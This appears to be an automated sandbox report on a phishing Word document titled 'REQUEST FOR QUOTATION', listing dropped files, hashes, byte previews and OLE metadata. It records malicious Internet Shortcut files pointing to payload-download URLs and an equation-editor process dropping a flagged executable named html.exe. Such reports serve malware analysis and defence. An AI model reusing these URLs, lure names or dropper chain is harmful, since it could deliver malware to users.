                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1536
                                                    Entropy (8bit):2.2123753075270276
                                                    Encrypted:false
                                                    SSDEEP:12:gApWmyayKpWmyayKpWmyayKpWmyaywyApWmyayKpWmyayKpWmyaK5ZTFC6N1WJGe:33oK3oK3oK3oa3oK3oK3Q5/vN1W5
                                                    MD5:FCD640DC735BB554D7655757CF0A5057
                                                    SHA1:85D97566764148FED4D4FC82306CCBF6324AB159
                                                    SHA-256:59C9B000D04FC0E4BE3BA4196E9DB1B765D8D49F48250C9A58D40ACAADEE4305
                                                    SHA-512:355AFAF94468E9E20C83E50172AA30D3432F93EB69A8E4733E3C8A298D3453985B761A119CD848BECDDD6A80CF72FB566F8F8B2393BC772C4CE61AB1ECA7CBAE
                                                    Malicious:false
                                                    Preview:........E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .......E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.025522682399296715
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPcAHHvxggLRH/wDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPfP7cvYg3J/
                                                    MD5:2A0836B980B90EC0096318322DD1168F
                                                    SHA1:9277A21DF02204059C3BA3AFD2A91EB79CADA761
                                                    SHA-256:C2F6F41D4EC9A36F779B027AE07213BD525747C2671ABCC6B53B404319123BF3
                                                    SHA-512:664514E868F305F8B44DCEB20FD97BD523F7B195FA0C0EC5CE72F0945CC9CDB3E39B0E7FE327AA83913D638DC97902F197EBC9DC2AD86208D8F661B829B54BB5
                                                    Malicious:false
                                                    Preview:......M.eFy...zK.F.I.A.....S,...X.F...Fa.q..............................'....I..n.T.................WG....).z^.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.02566577083543993
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPc7vI/vxggLRn2R8F2stGv5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0mLaTM0vYg3J/
                                                    MD5:FAB8881474C3EE52D22C122C0D4DD313
                                                    SHA1:4DFB830381D6569AB6F190108962F67DC2BABDD1
                                                    SHA-256:207017226D5EAD94C4E64E1BC6B8259C7C12D9BC6ED5516FCA4170E4BBB63D6A
                                                    SHA-512:16A083B3A0210BB8DF6C1E7C327B8E0EEA057B3C938F7AA7C48EE30ACD99929F841CD38DDB0604F61572C751ED6C63F110B826517D112D0FE1505294E7F03A9F
                                                    Malicious:false
                                                    Preview:......M.eFy...z.......G.._.48(.S,...X.F...Fa.q............................p.0.<..@..@.E.h...........>...{H....}f.J.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Mon May 6 11:59:00 2024, length=302225, window=hide
                                                    Category:dropped
                                                    Size (bytes):1094
                                                    Entropy (8bit):4.576623160749904
                                                    Encrypted:false
                                                    SSDEEP:24:8qqXO/XTBJ0xOqzD1FA4RrTF7eS+XFTFUDv3qkk7N:8PXO/XT4lzD7Rx2kiN
                                                    MD5:68057F1CB1E9BF6776DE982D3A5C6509
                                                    SHA1:DAFCD0335E358897E71D98684BA6428E891A9F24
                                                    SHA-256:318F49181D5D55500932BD08C80F627D943624DE6752381035FE92E3E4CDE432
                                                    SHA-512:C0F50FFBC9204810DB7B0F67D24CC07A7A893DC6626705D391A87975293B26149B1F1A87EE5BACFA617126DA9598B078597FF2590BA785FE6042FFF7EA907C71
                                                    Malicious:false
                                                    Preview:L..................F.... ...._..r...._..r...X..*.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X\g..user.8......QK.X.X\g*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Xag .REQUES~1.DOC..j.......WC..WC.*.........................R.E.Q.U.E.S.T. .F.O.R. .Q.U.O.T.A.T.I.O.N...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\114127\Users.user\Desktop\REQUEST FOR QUOTATION.docx.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.E.Q.U.E.S.T. .F.O.R. .Q.U.O.T.A.T.I.O.N...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Generic INItialization configuration [doc]
                                                    Category:dropped
                                                    Size (bytes):125
                                                    Entropy (8bit):5.043248036724947
                                                    Encrypted:false
                                                    SSDEEP:3:bDzS8PUqt0wdvw5Lf7SmX1Gvw5Lf7Sv:bPSGU0dC34C3c
                                                    MD5:7A03F41131FBE7C7F9F64A5CF95297BE
                                                    SHA1:2A21696EBC97ACE142FA0FE9CD96F1F11D4BC3BE
                                                    SHA-256:B32CE78CD7861858E4E6D6FF66935C48393375E4D7303E2EE0C0953D0852EDEE
                                                    SHA-512:E3F8BE5FD77470F7A4852315950F17982AE984876C6D11427F6594CED34CFE3E356A6E34A90FFE119863F1D6B403E15ACD2F7E588A32F8B20A840EC79422AB68
                                                    Malicious:false
                                                    Preview:[folders]..u7xc.url=0..rz on 104.168.33.34.url=0..REQUEST FOR QUOTATION.docx.LNK=0..[doc]..REQUEST FOR QUOTATION.docx.LNK=0..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<http://104.168.33.34/xampp/rzz/rz/>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.706238928653389
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQYm/GN8DVKP9y:HRYFVm/9Ds0
                                                    MD5:8986662C6BAF45AADDC74DA84EB9D4DA
                                                    SHA1:BB8B9CF711FB51109C1C5B6D30107C029E8C9614
                                                    SHA-256:E64F5BEB601417C17B1410095B8A6540AB2073B4F26CA884BEBCDB6D8ADB30D3
                                                    SHA-512:FC2C9EC73558E20CEBA8E98AF8778CEED40D3B2756D4AF8183824CAE544E2E9E1AE7A2FA0B7835F96E8723B975781D0D0820A9B8BF09C9245B1DDC245B0ACD76
                                                    Malicious:true
                                                    Preview:[InternetShortcut]..URL=http://104.168.33.34/xampp/rzz/rz/..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<http://wbze.de/u7xc>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):45
                                                    Entropy (8bit):4.552638373963222
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQYm/0HfS5n:HRYFVm/gM
                                                    MD5:B4B4598DF9402053D6BFAFF702F5E6EF
                                                    SHA1:214C8D27D6EE4BAA15E2EC9F54B36502A45EA068
                                                    SHA-256:AAD6EF302CCB3AE2D069123B9D91147B3CE76F7A289EABCDF365C137B075C2F8
                                                    SHA-512:03D4CC1D4BFF916B2F975C9BD2294506C43845BD6AAB3CCA934B8305A69CDEC1B520D1416D9D061A06D09171428146156273A068F1EFC5FFD1CE2273576062A9
                                                    Malicious:true
                                                    Preview:[InternetShortcut]..URL=http://wbze.de/u7xc..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):753152
                                                    Entropy (8bit):7.820038309246593
                                                    Encrypted:false
                                                    SSDEEP:12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
                                                    MD5:4C8B56B125AE41293AA6028204D44268
                                                    SHA1:21482DB39F9240559957F1FCCC61017D6845407E
                                                    SHA-256:1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
                                                    SHA-512:BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 37%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...
                                                    Process:C:\Users\user\AppData\Roaming\html.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):753152
                                                    Entropy (8bit):7.820038309246593
                                                    Encrypted:false
                                                    SSDEEP:12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
                                                    MD5:4C8B56B125AE41293AA6028204D44268
                                                    SHA1:21482DB39F9240559957F1FCCC61017D6845407E
                                                    SHA-256:1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
                                                    SHA-512:BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 37%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    File type:Microsoft Word 2007+
                                                    Entropy (8bit):7.986634324655397
                                                    TrID:
                                                    • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                    • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                    • ZIP compressed archive (8000/1) 7.92%
                                                    File name:REQUEST FOR QUOTATION.docx.doc
                                                    File size:302'225 bytes
                                                    MD5:d03e818c9b5e10f20be12369b980dcf4
                                                    SHA1:1b06f7e8918e40fe1fee605fdeb8fa008098b34d
                                                    SHA256:93c86de90e7a282f6999b7233cbb1b815bbdb8f1f103481b6f8ac0def74f88fe
                                                    SHA512:dcd284d6ed989062b69343add0dca6fb97e9072463fcb291be69ca9104a690c188673641c052d973e2b04c237a50282542fc2fb94fb06680e211b5e7b381d6a8
                                                    SSDEEP:6144:eGm/46IXMfqFO6S951ndPJofYeuCf5fbhCMGcfz+Cx:eGmgcfq4h1dPqfYeuCf5fVZlf/
                                                    TLSH:C15412FB37D0F919EC6F3587C4A54D41C137AA8168850C283A39A35F47B61EAE7708B6
                                                    File Content Preview:PK.........p.X.4..m...........[Content_Types].xmlUT.....8f..8f..8f.T.n.0..W.?D....CUU..]......{.n..6..wL(.* m.K...[f<q...*[..........p+....m....,Df.S.@I...pp}.......&.d....4..h.... R[.Y.W?....6.z...RnM....4....5...=..s....d.M].*.sNI.".ta....... ,.k..V..z.
                                                    Icon Hash:2764a3aaaeb7bdbf
                                                    Document Type:OpenXML
                                                    Number of OLE Files:7
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:31606
                                                    Entropy:7.916695020479147
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
